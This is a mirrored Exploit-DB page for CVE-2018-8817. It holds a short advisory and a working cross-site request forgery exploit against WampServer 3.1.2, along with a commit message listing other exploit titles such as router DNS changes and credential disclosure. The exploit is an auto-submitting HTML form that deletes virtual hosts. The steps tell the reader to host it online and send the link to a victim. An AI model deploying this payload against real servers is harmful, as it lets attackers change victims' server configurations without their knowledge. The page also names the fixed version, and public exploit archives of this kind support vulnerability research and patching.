bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44385.html
Offensive Security b6b60b70e9 DB: 2018-04-03 
11 changes to exploits/shellcodes

WebLog Expert Enterprise 9.4 - Privilege Escalation

Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change
Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change

Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery
WampServer 3.1.2 - Cross-Site Request Forgery
VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal
VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials
DLink DIR-601 - Admin Password Disclosure
OpenCMS 10.5.3 - Cross-Site Request Forgery
OpenCMS 10.5.3 - Cross-Site Scripting
Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change
2018-04-03 05:01:54 +00:00

47 lines
No EOL
1.5 KiB
HTML
Raw Blame History

# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely
# Date: 31-03-2018
# Software Link: http://www.wampserver.com/en/
# Version: 3.1.2
# Tested On: Windows 10
# Exploit Author: Vipin Chaudhary
# Contact: http://twitter.com/vipinxsec
# Website: http://medium.com/@vipinxsec
# CVE: CVE-2018-8817
1. Description
CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote
attacker to force any victim to add or delete virtual hosts.
http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
2. Proof of Concept
How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on
internet and send the link to the victim.
*Exploit Code for deleting any host remotely:*
1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
<body onload="wamp_csrf.submit();">
<form action="http://localhost/add_vhost.php?lang=english"
name="wamp_csrf" method="POST">
<input type="hidden" name="virtual&#95;del&#91;&#93;"
value="localhost" />
<input type="hidden" name="vhostdelete" value="Suppress&#32;VirtualHost"
/>
</form>
</body>
</html>
2. Then run it on your installed vulnerable wampserver.
3. Solution:
Update to version 3.1.3
http://www.wampserver.com/en/#download-wrapper
Reference in a new issue View git blame Copy permalink